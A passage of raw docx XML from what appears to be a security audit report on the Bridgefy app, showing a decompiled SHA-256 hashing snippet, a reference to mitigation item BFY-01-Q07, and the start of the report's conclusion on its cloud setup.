        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"SHA-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>256"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(messageDigest == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>break </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>block3;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="2303" w:right="0" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(NoSuchAlgorithmException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>noSuchAlgorithmException)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>noSuchAlgorithmException.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>arrby = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>arrby.getBytes(Charsets.UTF_8);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8409" w:val="left" w:leader="none"/>
          <w:tab w:pos="9153" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="366" w:firstLine="2987"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Intrinsics.checkNotNullExpressionValue(arrby,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>java.lang.String).getBytes(charset)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageDigest.update(arrby);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>arrby = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageDigest.digest();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageDigest = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>StringBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1907" w:right="1872" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Intrinsics.checkNotNullExpressionValue(arrby,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"byteData"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>); int n = arrby.length;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(int i = 0; i &lt; n; ++i) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="2078"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string2 = Integer.toString((int)((arrby[i] &amp; 255) + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>256), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(int)CharsKt.checkRadix(16));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="3068" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Intrinsics.checkNotNullExpressionValue(string2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="45"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"toString(this,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>checkRadix(radix))"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string2.substring(1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="2933"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Intrinsics.checkNotNullExpressionValue(string2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>java.lang.String).substring(startIndex)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageDigest.append(string2);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageDigest.toString();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This being said, user trust may additionally be improved by extrapolating the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q07</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="320"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250000" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002F7B"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="353"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Despite the number and severity of findings encountered in this exercise, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Bridgefy </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>solution defended itself well against a broad range of attack vectors. The platform will become increasingly difficult to attack as additional cycles of security testing and subsequent hardening continue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="375"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy provided a number of positive impressions during</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>assignment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>must</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be mentioned here:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="368" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The cloud implementation correctly isolates applications from each other by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>using separate AWS accounts. Additionally, infrastructure maintenance is facilitated via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>templates,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>reduce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>potential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
